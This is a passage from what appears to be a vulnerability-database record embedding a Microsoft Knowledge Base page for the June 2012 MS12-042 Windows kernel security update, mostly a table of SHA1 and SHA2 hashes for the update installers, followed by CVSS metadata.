href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2707511\" id=\"kb-link-8\">2707511 </a> MS12-042: Description of the security update for Windows XP and Windows Server 2003: June 12, 2012</div></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2709715\" id=\"kb-link-9\">2709715 </a> MS12-042: Description of the security update for Windows 7, Windows Server 2008 R2 2010, Windows Vista and Windows Server 2008: June 12, 2012</div></li></ul></div><h2>File hash table</h2><div class=\"kb-summary-section section\">The following table lists the thumbprints of the certificates that are used to sign the security updates. 
Verify the certificate thumbprint in this Knowledge Base article against the certificate thumbprint that is indicated on the security update that you download. <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Publisher file name</span></td><td class=\"sbody-td\"><span class=\"text-base\">Sha1</span></td><td class=\"sbody-td\"><span class=\"text-base\">SHA2</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-enu.exe</td><td class=\"sbody-td\">7F99E4B339653A9E947F85C04103C495BA8A97EB</td><td class=\"sbody-td\">E4FB7F3BE1E921A9760DC97B836186705E10CC8FEB2ACD4E821BBE1F2C3B601D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-fra.exe</td><td class=\"sbody-td\">4875C5E515007EA7F291060C341F6D20E25BFF30</td><td class=\"sbody-td\">59DFEAE7A11A8797CD44F126BA563D1CEC284CA86E3C34DEBD2F25321C5F9576</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-jpn.exe</td><td class=\"sbody-td\">7BED3C8C676E97C2EA9BDE2B04192DF2BB630CDB</td><td class=\"sbody-td\">9FD4BC4A434A32FFB6E8BE75135939F3495729C10A2A648E81015C0D008D5B8F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-ia64-deu.exe</td><td class=\"sbody-td\">89797041F4BB9FF03D91E85DEB2A00C1698C95BD</td><td class=\"sbody-td\">3CBA0162F116C6C7E5D4C582A5356D6E6E4A90411B5704BC4BF5600ACD968C78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-enu.exe</td><td class=\"sbody-td\">A02ADEE1F79D47CEB8CD6D466914A871E51620D3</td><td class=\"sbody-td\">AEEFF030B9433C6A042EF1DE946097833A17792DA5CF81FEF4105B593E8CF9F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-jpn.exe</td><td class=\"sbody-td\">6DF69ADABF9F65707B3647E75A91C3102CD9FD13</td><td 
class=\"sbody-td\">541A8A737EAFC63EB5E08472A5E5988793C5F66EC5E5A66FBD7FD71157B2880D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-enu.exe</td><td class=\"sbody-td\">7C9AFB9BD7C7CE2771AC76918B67AD804EE0D6D9</td><td class=\"sbody-td\">A6228A642367A343C60F003DFF7823FB8F3E76E04D7DD522CD2B240D7AC40B09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-csy.exe</td><td class=\"sbody-td\">131211D06F134B14DAB817D4DE537EBBD0D3688D</td><td class=\"sbody-td\">63F201960E7D44F33A817668E09957EDC2F1AEDB675AA334239F4532B90E8E65</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-jpn.exe</td><td class=\"sbody-td\">D5E2F73F67B85189F46825BA5AF073B76F98C3F2</td><td class=\"sbody-td\">2217C672CA0361CD68520313FFA94C2D360DDEC309C502CF1EC6815EBE687183</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-fra.exe</td><td class=\"sbody-td\">3DD57A602F354288E5678081BBCA6C33457F299E</td><td class=\"sbody-td\">AF64379E6988C862C2DF218CAC7AE3EE405F794C491B83C22EEE07423C75521D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-nld.exe</td><td class=\"sbody-td\">FF58FB52740A8598EB9C097417C07CA2650954CF</td><td class=\"sbody-td\">52C5ABC90AC0E859FE6B5F690DE7CA08334B3BBEBAA9D1763AFD5888C51A84CD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-hun.exe</td><td class=\"sbody-td\">FC3C5C7C9824656FC184BB0C57003C4AF661E584</td><td class=\"sbody-td\">99EEC193469F4EA1D48703A0C604147433A49937F37D9F3B56C69AD47A23B940</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ptb.exe</td><td class=\"sbody-td\">2BFE264152B3E10DEB3E9AD9C03C3403DFF4B0CE</td><td class=\"sbody-td\">BE6F0539B3C009B75CD4493D8765514214ABBA99CB0BFB37A1983DC5AC7A633B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-deu.exe</td><td 
class=\"sbody-td\">9E68D6540A7B811BFE17FC39A82975E358AF43AF</td><td class=\"sbody-td\">27AC1F4DF50D4C5E3A8487C12FD923CAA95F476FBB06B933671777099AF91C8D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-plk.exe</td><td class=\"sbody-td\">EC83EA2E7850EAA39F088A280DD7F6369C7E59B0</td><td class=\"sbody-td\">CB0C441B735DE56BE1A6E08B79BD537A6E2905C293A3EBFA3D899A492C936A71</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ptg.exe</td><td class=\"sbody-td\">E2EED4951CB307E8FCDD8787845A04687107A501</td><td class=\"sbody-td\">79DC5142B03EE1FCC6C3BFED04D61EAD40EE03EAE64B4631C558B5FA66985DE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-ita.exe</td><td class=\"sbody-td\">D9A5A88D2BA986A298C7D5DA4787D099B3448477</td><td class=\"sbody-td\">EC9B4378FB1E4B4FE2B22EC5C168DC304D4F42BE72D440DAB54CAB2DD53154E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-rus.exe</td><td class=\"sbody-td\">465F2CAAA66424FE01C7AAAA3ECB012B56FEE0B5</td><td class=\"sbody-td\">E83B0CBDB46644746F2764E2CA5E9C2080273AC159E7B3B6A15F6AD9C4AE5BCC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-esn.exe</td><td class=\"sbody-td\">9D3CAFC7F1EA4C9EBFA82793DA8ACC38E4D36D7C</td><td class=\"sbody-td\">B03CFE6A90CBF0A760C51154EFB5A738D1CCF4B566190D02191987497C3900B9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-sve.exe</td><td class=\"sbody-td\">497B25502C1A4FC3E23163F03F6A7455A8B35FEB</td><td class=\"sbody-td\">DE0D6F1EF04D288B3BF74921BE19FFB947F7D8977EC66D410CF803618B6FC84F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-trk.exe</td><td class=\"sbody-td\">1A2C6633070C159B568F2F5DAC1C26828020A51F</td><td class=\"sbody-td\">B394758A5E6D1733FD7F3E81586E9FD07EA4813501B1111791B4205516624E20</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsserver2003-kb2707511-x86-chs.exe</td><td class=\"sbody-td\">6775120045327A36BC22666ED8E6567CD7FB1695</td><td class=\"sbody-td\">5FD5CC2A04D350A1204DD1D467F4D6C8D54BC509BA2BEF0B555714170CF4D4C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-kor.exe</td><td class=\"sbody-td\">15A38C93DB28B34A96D76A7B2CBF0E0F5DC1F7CE</td><td class=\"sbody-td\">CFBC5F3B0C9778792282CD21B08998961BD4F006DFAFD54F008AB096CDDC598B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2707511-x86-cht.exe</td><td class=\"sbody-td\">BDBE324A32268A963A44EA7A2B38E112F338F119</td><td class=\"sbody-td\">060831AF14E166D4571512DB0A9F7F81E79AB8850E0FB5F8F9005463A6B20898</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-enu.exe</td><td class=\"sbody-td\">0AF63C8C4648C6A7CB7314A18AA9A07C5881F394</td><td class=\"sbody-td\">AEACF0B0742517CA99D0326486390AD2441262F8F96288FD0881C30F04940F58</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-csy.exe</td><td class=\"sbody-td\">E15D69799C600D68E94C0C9C7A549061A8B6C0A2</td><td class=\"sbody-td\">A0348ED4740526758D7041AF57D295A061ADFF103A25947C992B3C941775F941</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-dan.exe</td><td class=\"sbody-td\">0E7B7344DAB25F7A1376B37093117BF4D159FA0E</td><td class=\"sbody-td\">F812C5626F2A10625E1BC78D3A60177B79EB0E36DBC1EE02E8DF297D5AC1E12E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-esn.exe</td><td class=\"sbody-td\">1C8EF56B4C3748A51224765BA469F03DAA03382A</td><td class=\"sbody-td\">C799BF7B990C2ACDC789AEE249BCFAE855A0B4414C417D269CCFA1A305ECD6F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-fin.exe</td><td class=\"sbody-td\">C277D46E6182D88700614F6C808619610174A3C6</td><td class=\"sbody-td\">ACA788E64208B4FFE6DC52F0D2B7A6467CBC313E1E5ED453DFDF6ACF16B24A2B</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsxp-kb2707511-x86-heb.exe</td><td class=\"sbody-td\">8AD1877F16DF4F423BB70D51E92BD2F534EE3993</td><td class=\"sbody-td\">77D71B00FFBAF5A87C1A82CB9B1BE24838A9E6C43FCB406B99C047718F2326AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-hun.exe</td><td class=\"sbody-td\">D971C5E6DF31FD5107A6368D3A15694F661FB44C</td><td class=\"sbody-td\">CA88CEE19F60BC5D7EFBABE4DC3CD0663112DAD753AC72B2AF266A21318AA7D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-nld.exe</td><td class=\"sbody-td\">E383C9CB89CE1A1E57C854E30AAE671ACD497A1F</td><td class=\"sbody-td\">06FDE1A1E74307F61C49BF926AEF4EAFBF616F6E81BAC82188CC8E3306D90E0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-plk.exe</td><td class=\"sbody-td\">4F169D66D329D023B03B6520CC1B5AA59E47F0C2</td><td class=\"sbody-td\">B1D7380346A3F2566E0168AE78DBFA48E0BD113771595F7979BBFE1286211D91</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-nor.exe</td><td class=\"sbody-td\">2349CD62213D8A36DC9DE83672F4C055FA42565A</td><td class=\"sbody-td\">002460F7DF5ECDCF110CBC97856B66927569AE3C5ECDE1C63E154FC9BE462A0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-sve.exe</td><td class=\"sbody-td\">22FA93A675EB556F6CC73596C16FF47CB7066BC2</td><td class=\"sbody-td\">8DBB1EA72EEFB65715B0E1699A53B05B056F313F0E8368DD4C28FC8C7E90C228</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ptb.exe</td><td class=\"sbody-td\">558604535319FCB904AF3A48ED8259692F7E7D04</td><td class=\"sbody-td\">573F20828BA3EF8890F3B3540195A4D78F795FD0CF252A28E66AD4E4B1E06FEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-rus.exe</td><td class=\"sbody-td\">275C65277778A495D6E2DA5AA3DD0D5711A29FC8</td><td class=\"sbody-td\">227032A351DAD5C35258AF18C1ED0A34164876DD403A7C554D287DD62B4236C6</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsxp-kb2707511-x86-deu.exe</td><td class=\"sbody-td\">CC7DB3D29DDD1CFCEEDA36E0BD87FD10E69DBB80</td><td class=\"sbody-td\">3C620CAA7C1273911BDA3278889791C441AE5B21076FC84552ECE94011B49C5D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ara.exe</td><td class=\"sbody-td\">DD2FE4BF24F017E8FCCE183395329D648C886B65</td><td class=\"sbody-td\">7BBCD4359FBCDA3DC18EBEBFE15BAC4E30B02EF41A65ACE2A72364656D108758</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-cht.exe</td><td class=\"sbody-td\">2AA39FBAEAB5734E87869A188A9395B46A2A8CEC</td><td class=\"sbody-td\">2B8DD0EA187089BA8A34A1400F1B697CFF124CB5277EE6B0F848C72FFFBEDBAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ell.exe</td><td class=\"sbody-td\">970533FCAD502413B06672122417AACA2C6E0A17</td><td class=\"sbody-td\">0CE3D5A586C79CCB60F8A4DCC6FE772E27693FD294AAD2688A783016F333349B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ita.exe</td><td class=\"sbody-td\">90EAF07FC36A024FDC8D77501F68256980481C1F</td><td class=\"sbody-td\">DF42D439DDD94CEF9AC2A9A68C6370E5D56437E5A9A7315AE9C893F13A3B3F75</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-kor.exe</td><td class=\"sbody-td\">2ACD872CED018A9115A9EE53B88B58A4300B6953</td><td class=\"sbody-td\">D5F5DB778C45631D921191A233F2C4B0B8B62AF812749FB8CAECAC894C2783CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-trk.exe</td><td class=\"sbody-td\">82BE4852E57DA5447DB884E7B9C5A85F72A0078F</td><td class=\"sbody-td\">00F014F82ED71AA2B45DC146C06A35A080EAEB2571FF80DEB05122E046F845BB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-chs.exe</td><td class=\"sbody-td\">B9B33853EFCFB974185C7C8B21684C54FF91754D</td><td class=\"sbody-td\">4BAE0D7D74E480AFC0111E0DAA5AB7C2D398D66BC422FD5CFA1E97BBD60BB84A</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">windowsxp-kb2707511-x86-fra.exe</td><td class=\"sbody-td\">E230050257FA27F6BC2393D9A6834FF6C0A6F0C8</td><td class=\"sbody-td\">D28827BDFC03A4C6EAFF69E6F458FFD376449B4078D35426A69DA23AC2A6E0E9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-jpn.exe</td><td class=\"sbody-td\">B357504496B0AFE49A188752FF35D9BD00A4FF44</td><td class=\"sbody-td\">337962CB7C9D35892C8494A22E1750F9327AB5EF49D5C72E37C7E1B0C5408BCB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2707511-x86-ptg.exe</td><td class=\"sbody-td\">AB6F208C535169D6D25681B1DCCFEDF4BFDF50EE</td><td class=\"sbody-td\">C1A76CA9067D1916DD7C9685C9F6F4BDE3D37E49CF66AE3228754895DC0BBCE1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-fra.exe</td><td class=\"sbody-td\">400783F00EE11E90648F6F7590D16470A9854EC2</td><td class=\"sbody-td\">CE461789BFDA54D546963375F55F0F2FFF06D1E952E561B6FB9597045D67E188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-deu.exe</td><td class=\"sbody-td\">924B3342530FD7B33F585E503E945C775E41C2CE</td><td class=\"sbody-td\">2F357DDB27B3F0F19C10D28FE757E5C2F339F10AD10F47579307D657F22CDBBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-ptb.exe</td><td class=\"sbody-td\">FD0E560002D26B75C38EC7CF8EF6F45AE0086385</td><td class=\"sbody-td\">39D9B76F40AAFB93CAAAF235F8017B73EA014519658304DD43F8BEA37BB42846</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-esn.exe</td><td class=\"sbody-td\">A266EEF4F137A2A675F8406BD3A006D9511E3C0A</td><td class=\"sbody-td\">2511698E1329BC9E2B03E667110666387C944CE584DD30D7F1A3FB8B0FE2B2EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-chs.exe</td><td class=\"sbody-td\">8B6AC88F8831206FA4640DE1FFA7C088FF1C3CBF</td><td 
class=\"sbody-td\">A88F325B5FE733D3A59FBC8A51865593FB3A3081FBD631DD899FEDC08ECB55AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-kor.exe</td><td class=\"sbody-td\">78350EBD34DB41D0C97202D87B72C781D9CFBA7E</td><td class=\"sbody-td\">73F5E1518249AB5490E62776A040C3639D9101CEDDFB2086DD124E3C32F9F279</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-rus.exe</td><td class=\"sbody-td\">695947CE0B536F230707EA71DD5F61B2F6D84E42</td><td class=\"sbody-td\">CD1473F96E4A43FD1BB1B0D0E67C5A38E62DD3239C892A3E7D59EAE034FF2A4B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-ita.exe</td><td class=\"sbody-td\">20F93FEAF185589E18997518CFE0291EE24EB08B</td><td class=\"sbody-td\">EA54EC6E7FB63446EE5201617A73CBEB29CA6DD08735BC555F20CDF3C70BC37F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2707511-x64-cht.exe</td><td class=\"sbody-td\">A9A0E216540ACF40B36F7AD8913E60E453A71F5C</td><td class=\"sbody-td\">4E09195A2CD7E6BC4387104D3F0D9581D185CC656070F423C17A19E6CD611E93</td></tr></table></div></div></body></html>", "edition": 2, "modified": "2012-06-12T17:07:37", "id": "KB2711167", "href": "https://support.microsoft.com/en-us/help/2711167/", "published": "2012-06-12T00:00:00", "title": "MS12-042: Vulnerabilities in Windows Kernel could allow elevation of privilege: June 12, 2012", "type": "mskb", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}